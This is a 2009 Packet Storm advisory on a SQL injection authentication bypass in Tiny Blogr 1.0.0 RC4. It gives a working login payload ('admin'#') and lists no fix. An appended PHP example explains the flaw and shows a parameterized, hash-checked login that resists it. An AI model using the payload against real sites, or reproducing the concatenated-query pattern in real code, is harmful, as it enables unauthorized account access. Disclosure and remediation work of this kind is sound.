Tiny Blogr 1.0.0 RC4 SQL Injection

2009-04-17T00:00:00
ID PACKETSTORM:76774
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-04-17T00:00:00

Description

                                        
`******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Tiny Blogr  
[+] Version: 1.0.0 rc4  
[+] Website: http://tinyblogr.sourceforge.net  
  
[+] Bugs: [A] Authentication Bypass  
  
[+] Exploitation: Remote  
[+] Date: 17 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Authentication Bypass  
  
[-] Risk: medium  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: class.eport.php  
  
This bug allows a guest to bypass the authentication  
system.  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Authentication Bypass  
  
Username: admin'#  
Password: foo  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
`
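
Since the advisory lists no fix, the following added example (not Tiny Blogr source and not from the advisory's author) shows why the username above removes the password check from a concatenated login query, next to a parameterized replacement. The query shape, the users table, its columns and the sample account are assumptions made for illustration; class.eport.php itself is not reproduced here.

```php
<?php
declare(strict_types=1);

// Added example, not Tiny Blogr source. Table, columns and account are constructed.

// Assumed shape of a login query built by string concatenation.
function concatenated_query(string $user, string $pass): string
{
    return "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
}

// Hardened form: the username is bound as data and the password is checked
// against a stored hash, so quote and comment characters never reach the SQL parser.
function login(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id, pass_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['pass_hash'])) {
        return null; // unknown user or wrong password
    }
    return (int) $row['id'];
}

// In-memory SQLite database standing in for the application's user store.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pass_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// With magic_quotes_gpc off, the advisory's input reaches the query unescaped.
// In MySQL '#' starts a comment, so everything after the username test is ignored.
echo concatenated_query("admin'#", 'foo'), PHP_EOL;

// The same input against the prepared statement matches no username: login fails.
var_dump(login($db, "admin'#", 'foo'));
// A real username with the wrong password also fails.
var_dump(login($db, 'admin', 'foo'));
// Only the correct credentials return the account id.
var_dump(login($db, 'admin', 'constructed-sample-password'));
```

magic_quotes_gpc was removed in PHP 5.4, so the "Requisites" line above holds on every current PHP runtime and the binding has to be done in the application code.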